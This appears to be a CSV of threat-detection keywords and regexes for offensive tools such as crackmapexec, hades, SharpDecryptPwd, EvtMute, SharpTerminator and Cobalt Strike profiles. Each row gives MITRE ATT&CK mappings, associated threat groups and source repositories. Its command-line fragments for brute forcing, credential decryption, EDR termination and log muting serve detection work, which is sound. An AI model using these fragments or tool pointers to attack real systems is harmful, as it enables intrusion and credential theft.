"*.exe UnattendedInstallFiles*",".{0,1000}\.exe\sUnattendedInstallFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4637"
"*.exe UnquotedServicePath*",".{0,1000}\.exe\sUnquotedServicePath.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4638"
"*.exe -v -u * -w 10k-most-common.txt*",".{0,1000}\.exe\s\-v\s\-u\s.{0,1000}\s\-w\s10k\-most\-common\.txt.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","4639"
"*.exe -w *.dll -l TEMP -p true -d 4096 -s user,pass*",".{0,1000}\.exe\s\-w\s.{0,1000}\.dll\s\-l\sTEMP\s\-p\strue\s\-d\s4096\s\-s\suser,pass.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","4640"
"*.exe Whisker -action add -target * -cert-pass *",".{0,1000}\.exe\sWhisker\s\-action\sadd\s\-target\s.{0,1000}\s\-cert\-pass\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4641"
"*.exe Whisker -action list -target *",".{0,1000}\.exe\sWhisker\s\-action\slist\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4642"
"*.exe --winlogon * *:\*.exe*",".{0,1000}\.exe\s\-\-winlogon\s.{0,1000}\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4643"
"*.exe --wmi *:\*.exe*",".{0,1000}\.exe\s\-\-wmi\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4644"
"*.exe Xmanager /user:* /sid:* /path:**",".{0,1000}\.exe\sXmanager\s\/user\:.{0,1000}\s\/sid\:.{0,1000}\s\/path\:.{0,1000}.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","4645"
"*.exe -Xmangager -p *",".{0,1000}\.exe\s\-Xmangager\s\-p\s.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","4646"
"*.exe* -d localhost * -u * -p */24*",".{0,1000}\.exe.{0,1000}\s\-d\slocalhost\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\/24.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","4647"
"*.exe* -f *.bin -t queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-f\s.{0,1000}\.bin\s\-t\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4648"
"*.exe* --Filter *rule disable { condition: true }*",".{0,1000}\.exe.{0,1000}\s\-\-Filter\s.{0,1000}rule\sdisable\s\{\scondition\:\strue\s\}.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","4649"
"*.exe* -path * -newTimestamp * -username * -password *",".{0,1000}\.exe.{0,1000}\s\-path\s.{0,1000}\s\-newTimestamp\s.{0,1000}\s\-username\s.{0,1000}\s\-password\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","4650"
"*.exe* -t queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-t\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4651"
"*.exe* -t remotethread*",".{0,1000}\.exe.{0,1000}\s\-t\sremotethread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4652"
"*.exe* -t selfthread*",".{0,1000}\.exe.{0,1000}\s\-t\sselfthread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4653"
"*.exe* --technique queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-\-technique\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4654"
"*.exe* --technique remotethread*",".{0,1000}\.exe.{0,1000}\s\-\-technique\sremotethread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4655"
"*.exe* --technique selfthread*",".{0,1000}\.exe.{0,1000}\s\-\-technique\sselfthread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4656"
"*.exe* -u administrator -H :*--shares*",".{0,1000}\.exe.{0,1000}\s\-u\sadministrator\s\-H\s\:.{0,1000}\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","4657"
"*.exe*\Terminator.sys*",".{0,1000}\.exe.{0,1000}\\Terminator\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","4658"
"*.exe._obf.exe*",".{0,1000}\.exe\._obf\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","4659"
"*.Execution.Injection.Exe*",".{0,1000}\.Execution\.Injection\.Exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4661"
"*.feeds.123456.*",".{0,1000}\.feeds\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4662"
"*.files.123456.*",".{0,1000}\.files\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4663"
"*.forums.123456.*",".{0,1000}\.forums\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4664"
"*.ftp.123456.*",".{0,1000}\.ftp\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4666"
"*.get_c2profile*",".{0,1000}\.get_c2profile.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","4667"
"*.ghostsocks.json*",".{0,1000}\.ghostsocks\.json.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","4668"
"*.go.123456.*",".{0,1000}\.go\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4669"
"*.groups.123456.*",".{0,1000}\.groups\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4671"
"*.help.123456.*",".{0,1000}\.help\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4672"
"*.herominers.com*",".{0,1000}\.herominers\.com.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","4673"
"*.HTA loader with .HTML extension for specific command*",".{0,1000}\.HTA\sloader\swith\s\.HTML\sextension\sfor\sspecific\scommand.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","4674"
"*.imap.123456.*",".{0,1000}\.imap\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4675"
